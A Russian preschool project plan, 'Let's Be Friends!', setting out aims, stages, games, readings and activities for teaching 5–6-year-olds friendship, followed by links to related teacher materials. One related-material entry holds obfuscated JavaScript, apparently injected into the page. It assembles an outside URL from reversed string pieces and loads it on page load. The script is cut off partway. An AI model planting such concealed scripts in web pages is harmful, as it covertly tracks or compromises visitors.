Проект "Давай дружить!"
проект (старшая группа) на тему
Проблема формирования положительных взаимоотношений между детьми, является актуальной, так как способствует вхождению ребенка в социум, взаимодействию с окружающими людьми. Реализация данного проекта способствует формированию дружеских взаимоотношений у детей группы: умение жить в коллективе, считаться с мнением других детей, адекватно оценивать себя и своих друзей, помогает усвоить нормы и правила поведения, облегчает переход из детского сада в школу, к активному общению в период адаптации.
Скачать:
Вложение | Размер |
---|---|
davay_druzhit.doc | 38.5 КБ |
Предварительный просмотр:
Проект «Давай дружить!»
Тип проекта: групповой, творческий, информационный, игровой, познавательный
Классификация: долгосрочный (сентябрь)
Состав участников: групповой; участники: дети, родители, воспитатели, музыкальный руководитель
Возраст: 5-6 лет
Используемые образовательные технологии:
Игры и упражнения на развитие эмоциональной сферы
Спортивные игры и соревнования
Технология музыкального воздействия
Технология воздействия живописью
Технология познавательного развития
Использование мультимедийных презентаций
Актуальность:
Проблема формирования положительных взаимоотношений между детьми, является актуальной, так как способствует вхождению ребенка в социум, взаимодействию с окружающими людьми. Реализация данного проекта способствует формированию дружеских взаимоотношений у детей группы: умение жить в коллективе, считаться с мнением других детей, адекватно оценивать себя и своих друзей, помогает усвоить нормы и правила поведения, облегчает переход из детского сада в школу, к активному общению в период адаптации.
Цель проекта:
Формирование положительных взаимоотношений детей старшего дошкольного возраста со сверстниками в группе.
Задачи:
1. Воспитательные: воспитывать дружелюбие, доброжелательное отношение друг к другу, сопереживание, сочувствие, взаимопомощь, потребность проявлять доброту, заботу, внимательное отношение к окружающим, способствовать сплоченности коллектива.
2. Развивающие: развивать коммуникативные навыки, социально- коммуникативные качества (сотрудничество, гибкость, терпимость, умение поддерживать развивающий диалог, развивать связную речь, обогащать словарный запас, побуждать к использованию в речи пословиц и поговорок, умение применять свои знания на практике, развивать творчество в художественно- продуктивной деятельности.
3. Обучающие: расширять и систематизировать знания о культуре поведения и взаимоотношениях между детьми, учить размышлять над нравственной сутью поступков.
Пути решения поставленных задач
-Развитие познавательной деятельности дошкольников в ходе совместной практической деятельности с воспитателем и родителями (обогащение знаний детей о роли мамы в их жизни, через раскрытие образа матери в поэзии, в живописи, музыке, художественной литературе; воспитание заботливого, уважительного отношения к маме; совершенствование уровня накопленных практических навыков детей и родителей:
-Развитие художественного вкуса детей и взрослых,
-Развитие творческих способностей детей в продуктивной и в музыкальной деятельности,
-Совершенствование стиля партнёрских отношений.
-Расширение кругозора детей и закрепление их знаний ;
-Осуществление в группе воспитательно-образовательного процесса по обозначенной теме.
-Обогащение активного словаря детей эпитетами, образными выражениями, пословицами и поговорками, стихами о маме
-Развитие связной речи, умения составлять повествовательные рассказы, опираясь на личный опыт.
-Развитие продуктивной деятельности детей; достижение плодотворного результата по художественному творчеству детей в разных направлениях (рисунки, аппликация, лепка); развитие детского творчества;
-Создание и обогащение картотеки «Художественного народного творчества произведений о маме» совместно с родителями.
-Вовлечение родителей в педагогический и творческий процесс работы группы, укрепление заинтересованности в сотрудничестве с детским садом Статьи в родительский уголок «День матери: история и традиции»; подбор журналов, литературы для индивидуальной работы родителям на тему «Роль матери в воспитании ребенка в семье». «Изречения известных людей о маме». Беседы с родителями на эти темы.
-Проведение «Вечера сказок» (чтение сказок мамой, викторины по сказкам, драматизация).
Поэтапное развитие проекта «Давай дружить!»
№ | Этапы | Содержание |
1. | Выбор темы проекта сентябрь | Удовлетворение интересов и потребностей ребенка, запросов родителей. Инициатор воспитатель, музыкальный руководитель |
2. | Планирование | -Беседа с детьми и родителями -Изготовление совместно с ребенком подарка - сюрприза его другу; -Наблюдение за детьми -Системная паутинка проекта -Календарное планирование |
3. | Реализация проекта | Задача воспитателя; организация деятельности детей в центрах активности, оснащение центров оборудованием и материалами в соответствии с темой проекта: - Создание проблемной ситуации — День рождение друга -Подбор методической литературы по данной теме; разработка конспектов занятий -Подбор художественной детской литературы -Подбор аудиозаписей по данной теме. -Подбор дидактического материала, иллюстраций.«Добрые слова», «Не забывай о друзьях», «Опиши своего друга», «Комплименты», «Закончи фразу», видеороликов. Создание развивающей среды (оснащение центров активности) Подбор детской художественной литературы для книжного уголка Подбор настольно–печатных и дидактических игр
Центр физического развития: создание предметно-развивающей среды и совместное изготовление атрибутов для двигательной активности детей Центр продуктивной деятельности: подборка материалов для рисования, лепки, аппликации |
4. | Итоговое мероприятие 30 сентября | Вечер развлечений «Остров Дружба» |
5. | Завершение проекта | Создание презентации проекта |
Системная паутинка проекта «Давай дружить!»
№ | Образовательная область | Непосредственно образовательная деятельность |
1. | Социально-коммуникативное развитие | Этическая беседа: «В чем сила дружбы? » - Беседа «Если с другом вышел в путь»; - Игровые упражнения «Кто первым поздоровается?»; - Дидактическая игра «Наши добрые слова»; -Образовательные ситуации: «Уроки вежливости» - Сюжетно-ролевые игры: «В гости к другу», «Друг заболел», «Бюро добрых услуг», День рождение подружки» -Труд. Коллективная постройка песочной композиции -«Давайте познакомимся» - коммуникативные игры |
2. | Художественно-эстетическое развитие | - Рассматривание картинок с развивающим диалогом: «Хорошо ли злиться? », «Хорошо ли обижаться? », «Умею ли я мириться? » (из серии (Я и мое поведение») - Чтение художественной литературы с последующей беседой: В. Осеева «До первого дождя», В. Катаев «Цветик- семицветик», С. Михалков «Хорошие товарищи», Е. Благина «Подарок», «Кто живет в пруду?», «Малыш и Карлсон», Софья Прокофьева «Сказка про грубое слово «уходи», «Сказка про волшебные перышки»; Генрих Сапгир «Мой друг зонтик» -Художественное творчество: Рисование: «Я и мои друзья», «Радуга Дружбы», «Нарисуй какую хочешь картинку для своего друга». Аппликация. Изготовление коллективного панно «Дом Дружбы ». -Этюды : друзья поссорились, сердятся, друзья померились, радуются; «Угадай мое настроение», «Передай свое настроение»; -Минутки изобразительной деятельности: «Дорисуй мой рисунок» Просмотр мультфильмов о дружбе «Кот Леопольд», «Львенок и черепаха», «По дороге с облаками», «Грибок — теремок», «Кто похвалит меня лучше всех» -Слушание и пение песен о дружбе: «Улыбка», «Настоящий друг», «Веселые друзья», «Все мы делим пополам» -Концерт для осенних именинников «От улыбки станет всем светлей». - Инсценировка произведения В. Осеевой «Волшебное слово»; |
3. | Речевое развитие | Беседы: «Доброта и вежливость- залог дружбы», «Секреты дружбы» -Составление ребенком рассказа о его друге; - Словесные, коммуникативные игры: «Назови ласково», «Угадай, чей голосок» «Кто похвалит друга лучше всех», «Волшебная конфета» - учить говорить друг другу комплименты - Заучивание стихов о дружбе «Наша группа», «Наши игрушки», «Новая девочка», «Мы подружились в детском саду», «Детский сад», «Друзья». - Вечер пословиц и поговорок о дружбе - Ситуативные разговоры, игры- интервью: «Скажи мне, кто твой друг? », «Каким должен быть друг? » «Хороший ли ты друг? », «Хорошо ли иметь друга? », «Чем можно порадовать друга? » «Что ты сегодня сделал приятного для друга? » |
4. | Познавательное развитие | -Беседа «Драться или договариваться»; -Дидактические игры: «Что такое хорошо, что такое плохо», «Как хорошо с тобой дружить»; «Правила поведения» -Составление правил о поведение в группе -Игра «Ромашка» -какими качествами должен обладать настоящий друг |
5. | Физическое развитие | Зарядка «Вместе весело шагать!» -Подвижные игры: «Ручеек», «Кот и мышка», «Апельсин», «Твистер», игра- шутка: «Сиамские близнецы» -Игры на сотрудничество: «Слепой и поводырь», «Паутина», «Путаница», «Обруч», «Дорожка препятствий». Спортивное соревнование «Если с другом вышел путь» |
Литература:
Нечаева В.Г., МарковаТ.А., Жуковская Р.И., Година Г.Н., Козлова С.А., Виноградова Н.Ф., Буре Р.С., Загик Л.В., Виноградова А.М. Нравственное воспитание в детском саду. – 3-е изд., испр. и доп. – М.: Просвещение, 1984.
Петрова В.И., Стульник Т.Д. Этические беседы с детьми 4-7 лет: Нравственное воспитание в детском саду. Пособие для педагогов и методистов. – 2-е изд., испр. и доп. – М.: Мозаика-Синтез, 2008.
Ветлугина Н.А., Казакова Т.Г. Нравственно-эстетическое воспитание ребенка в детском саду. – М.: Просвещение, 1989.
Журавлева Е.Н. Развиваем творческое воображение дошкольников: пособие для педагогов учреждений, обеспечивающих получение дошкольного образования. – Мозырь: Белый Ветер, 2010.
Комарова Т.С., Савенков А.И. Коллективное творчество дошкольников: Учебное пособие. – М.: Педагогическое общество России, 2005.
По теме: методические разработки, презентации и конспекты
Проект «C туризмом дружит вся семья» (старший дошкольный возраст)
Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....
Если хочешь долго жить - научись с огнем дружить!
Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....
Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"
Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...
Конспект занятия "Давайте дружить"
Конспект занятия по развитию речи в 1 младшей группе....
Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».
Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...
Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...
Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»
Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...